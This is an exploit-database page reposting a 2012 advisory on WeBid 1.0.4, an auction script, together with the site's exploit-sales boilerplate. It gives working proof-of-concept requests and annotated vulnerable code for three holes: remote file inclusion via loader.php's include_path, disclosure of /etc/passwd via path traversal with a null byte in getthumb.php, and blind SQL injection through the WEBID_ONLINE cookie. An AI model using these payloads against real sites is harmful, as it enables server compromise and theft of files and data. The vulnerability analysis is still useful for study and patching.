0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WeBid <= 1.0.4 Multiple Vulnerabilities
[:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ posdub[at]gmail.com ]
[ 2012-08-17 ]
################################################
# [ WeBid <= 1.0.4 ] Multiple Vulnerabilities #
################################################
#
# Script: "Open source php/mysql fully featured auction script"
#
# Vendor: http://www.webidsupport.com/
# Download: http://sourceforge.net/projects/simpleauction/files/simpleauction/
#
################################################
# [RFI] ( allow_url_include = On; register_globals = On; )
# PoC: http://localhost/WeBid/loader.php?js=admin/logout.php&include_path=http://localhost/info.txt?
#
# File: ./WeBid/loader.php (lines: 15-60)
# ..cut..
# ob_start('ob_gzhandler');
# header("Content-type: text/javascript");
# include 'includes/checks/files.php'; // 1 ( Definition of $file_hashs array )
# if (isset($_GET['js']))
# {
# $js = explode(';', $_GET['js']); // 3 js = admin/logout.php (for example)
# foreach ($js as $val)
# {
# $ext = substr($val, strrpos($val, '.') + 1); // 4
# if ($ext == 'php') // 4
# {
# if (check_file($val)) // 5
# {
# include $val; // 10 include admin/logout.php
# }
# }
# ..cut..
# }
# }
# ob_end_flush();
#
# function check_file($file)
# {
# global $file_hashs; // 6
# $tmp = $file_hashs;
# $folders = explode('/', $file); // 7 $folders = Array([0] => admin, [1] => logout.php)
# foreach ($folders as $val) // 8 This loop checks if parts of $folders are in $file_hashs
# {
# if (isset($tmp[$val]))
# {
# $tmp = $tmp[$val];
# }
# else
# {
# return false;
# }
# }
# return true; // 9 admin/logout.php passed
# }
# ..cut..
#
# File: ./WeBid/includes/checks/files.php (lines: 2-19)
# ..cut..
# $file_hashs = array( // 2 List of files that can be included.
# ..cut..
# 'admin' => array( // 2
# 'logout.php' => 'a0db39b73dcfd29feb1466002c4f59a4', // 2
# ..cut..
# ),
# ..cut..
# );
#
# File: ./WeBid/admin/logout.php (lines: 16-17)
# ..cut.. // 11 common.inc.php file contains a definition of $include_path
# include '../includes/common.inc.php'; // 11 Failed, because loader.php is in root path
# include $include_path . 'functions_admin.php'; // 12 *[RFI] $include_path is not set by script
# ..cut.. // 12 If register_globals is On, we can set $include_path
#
################################################
# [Local File Disclosure] ( magic_quotes_gpc = Off; php version < 5.3.4 )
# PoC: http://localhost/WeBid/getthumb.php?fromfile=getthumb.php&w=../../../../../etc/passwd%00
#
# File: ./WeBid/getthumb.php (lines: 17-52)
# ..cut..
# $w = (isset($_GET['w'])) ? $_GET['w'] : ''; // 1
# $fromfile = (isset($_GET['fromfile'])) ? $_GET['fromfile'] : ''; // 2
# $nomanage = false;
# ..cut..
# if (!isset($_GET['fromfile'])) // 3
# {
# ErrorPNG('params empty');
# exit;
# }
# elseif (!file_exists($_GET['fromfile']) && !fopen($_GET['fromfile'], 'r')) // 4
# {
# ErrorPNG('img does not exist');
# exit;
# }
#
# if (file_exists($upload_path . 'cache/' . $_GET['w'] . '-' . md5($fromfile))) // 5
# {
# $img = getimagesize($fromfile);
# if ($img[2] == 1)
# {
# $img['mime'] = 'image/png';
# }
# header('Content-type: ' . $img['mime']);
# echo file_get_contents($upload_path . 'cache/' . $_GET['w'] . '-' . md5($fromfile)); // 6 *[LFD]
# }
# }
# ..cut..
#
################################################
# [Blind SQL Injection] ( magic_quotes_gpc = Off; )
# PoC:
# http://localhost/WeBid/contents.php
# GET /WeBid/contents.php HTTP/1.1
# Host: localhost
# User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0.1
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: pl,en-us;q=0.7,en;q=0.3
# Accept-Encoding: gzip, deflate
# Connection: keep-alive
# Cookie: WEBID_ONLINE=-1' OR 1=1--
#
# File: ./WeBid/contents.php (lines: 15, 38)
# ..cut..
# include 'includes/common.inc.php';
# ..cut..
# include 'header.php'; // 1
# ..cut..
#
# File: ./WeBid/header.php (line: 26)
# ..cut..
# $counters = load_counters(); // 2
# ..cut..
#
# File: ./WeBid/includes/functions_global.php (line: 287-320)
# ..cut..
# function load_counters() // 3
# {
# ..cut..
# if (!$user->logged_in)
# {
# if (!isset($_COOKIE['WEBID_ONLINE']))
# {
# $s = md5(rand(0, 99) . session_id());
# setcookie('WEBID_ONLINE', $s, time() + 900);
# }
# else
# {
# $s = $_COOKIE['WEBID_ONLINE']; // 4
# setcookie('WEBID_ONLINE', $s, time() + 900);
# }
# }
# ..cut..
# $query = "SELECT id FROM " . $DBPrefix . "online WHERE SESSION = '$s'"; // 5 *[SQL]
# $res = mysql_query($query);
# $system->check_mysql($res, $query, __LINE__, __FILE__);
# ..cut..
#
### [ dun / 2012 ] #############################
# 0day.today [2024-11-15] #